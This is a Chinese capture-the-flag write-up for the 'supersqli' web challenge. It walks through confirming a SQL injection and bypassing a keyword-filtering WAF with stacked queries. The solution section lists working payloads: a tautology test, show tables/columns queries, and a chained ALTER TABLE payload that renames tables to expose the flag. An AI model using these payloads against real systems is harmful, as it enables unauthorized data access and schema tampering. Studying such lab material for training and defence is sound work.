攻防世界-web-supersqli

1. 题目描述：

 2. 思路分析

这里尝试按照基本思路进行验证，先确定注入点，然后通过union查询依次确认数据库名，表名，字段名，最终获取到我们想要的字段信息。

这里只有一个输入框，所以注入点肯定存在且只有一个，我们可以简单验证下：

 

使用 or 永真修改查询条件可以将所有信息查询出来，因此这里肯定是存在sql注入的

然后尝试使用union select查询出数据库名

我们发现结果并不是我们想要的，我们的sql注入语句被waf拦截掉了，看报错信息，waf过滤了select, update, delete, drop, insert, where等字符，而且无法进行大小写绕过

因此，这里的关键就是如何绕过waf的限制

这里试过注释绕过和大小写绕过，发现无法绕过waf的限制。

因此这里常见的union select注入方法在这里不生效

尝试用其它方式来获取表名和字段名，这里参考资料攻防世界-supersqli详解_Mr H的博客-CSDN博客，

思路如下：

1. 使用堆叠注入获取表名和字段名，

2. 将我们需要查的表名修改为默认查询的表名

博客里提到的一种预编译绕过的方式可以让我们绕过waf的限制使用select语句，处理起来较为复杂，这里就不详细说明了

3. 解题过程

1. 使用1'; show databases; -- 1 获取到所有的数据库名

2. 使用1'; show tables; -- 1 获取到所有的表名

 

3. 使用1'; show columns from words; -- 1 和 1'; show columns from `1919810931114514`; -- 1获取到两个表的字段名

 我们可以看到，flag就在表1919810931114514中

4. 最后就是查询字段的内容了

我们看到，服务端默认的查询语句查询出两个字段，说明查询的是words表，我们将表1919810931114514的名字改成words并且将flag字段改为id字段不就行了吗? 试一下

先将words表名改为words1:
alter table words rename to words1;

然后将1919810931114514表名改为words

alter table `1919810931114514` rename to words;

最后将flag字段改为id，并将属性设置为varchar

alter table words change flag id varchar(50); -- 1

三条语句需要合并在一起，不然先改了words表名会导致后面无法执行成功:

1'; alter table words rename to words1; alter table `1919810931114514` rename to words; alter table words change flag id varchar(50); -- 1

（PS：这里一定要手动输入，直接拷贝可能存在编码问题，一直不成功）

最后，通过如下语句查询出flag

1' or 1 = 1 -- 1

总结：这道题展示了另一种sql注入的方法，堆叠注入，在waf对select, where等常规查询字段进行了限制的情况下，我们可以通过show, alter等sql语句来进行绕过，最终获取到我们需要的信息。